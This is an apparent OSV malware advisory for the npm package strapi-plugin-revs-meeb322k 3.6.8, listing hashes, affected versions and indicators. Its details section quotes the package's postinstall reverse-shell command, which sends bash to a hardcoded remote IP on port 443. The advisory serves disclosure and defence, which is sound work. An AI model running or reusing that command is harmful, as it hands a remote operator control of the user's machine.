MAL-2026-16184

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/strapi-plugin-revs-meeb322k/MAL-2026-16184.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-16184
Published
2026-09-15T15:54:40Z
Modified
2026-09-15T16:31:26Z
Summary
Malicious code in strapi-plugin-revs-meeb322k (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (d76370f1e289c374fef3b0cea33d2c21fcaa09e7937ecf6d8ba6386916225878)

strapi-plugin-revs-meeb322k@3.6.8 ships a postinstall.js registered as scripts.postinstall in package.json. On npm install, the script runs child_process.exec of bash -c 'bash -i > /dev/tcp/14.225.210.85/443 0>&1 2>&1', opening an interactive reverse shell from the installer's machine to the hardcoded remote endpoint 14.225.210.85:443 and giving the operator of that endpoint arbitrary command execution on the installer.

Database specific
{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-020059",
            "import_time": "2026-09-15T16:19:15.283063371Z",
            "modified_time": "2026-09-15T15:54:40Z",
            "sha256": "d76370f1e289c374fef3b0cea33d2c21fcaa09e7937ecf6d8ba6386916225878",
            "source": "amazon-inspector",
            "versions": [
                "3.6.8"
            ]
        }
    ]
}
References
Credits

Affected packages

npm / strapi-plugin-revs-meeb322k

Package

Name
strapi-plugin-revs-meeb322k
View open source insights on deps.dev
Purl
pkg:npm/strapi-plugin-revs-meeb322k

Affected ranges

Affected versions

3.*
3.6.8

Database specific

cwes
[
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    }
]
indicators
{
    "evidence_files": [
        {
            "path": "postinstall.js",
            "sha256": "b03386a722764d8d57174b27e91dba39f52953122b1fbf3596e15d23e64e04fa",
            "tlsh": "8611cb4166f9273562338ddde60b982ba3474e05703ae517b98c03171ec6c8cc5426fd"
        },
        {
            "path": "package.json",
            "sha256": "413953a9194d354bf4275d2f0ea735ca8fd72ff9925b34b0a42aad6c8a7b4672",
            "tlsh": "a7d0a710c9119333bdc4569c1823814bab719d0f1449f82d27f71148424bbbb987b36f"
        }
    ],
    "package_integrity": [
        {
            "filename": "strapi-plugin-revs-meeb322k-3.6.8.tgz",
            "hashes": {
                "sha1": "fa9e355e79c0fa05d34ce39a28da77a5c321e08d",
                "sha512_sri": "sha512-r0O9d8UoyPRMrU0HM5PlPL7beaAH/vnJf6n7nmA3yUPFSDFaof8cBpXACjiIOqMjrpA7th5pQ5s8RecwHTrijg=="
            }
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/strapi-plugin-revs-meeb322k/MAL-2026-16184.json"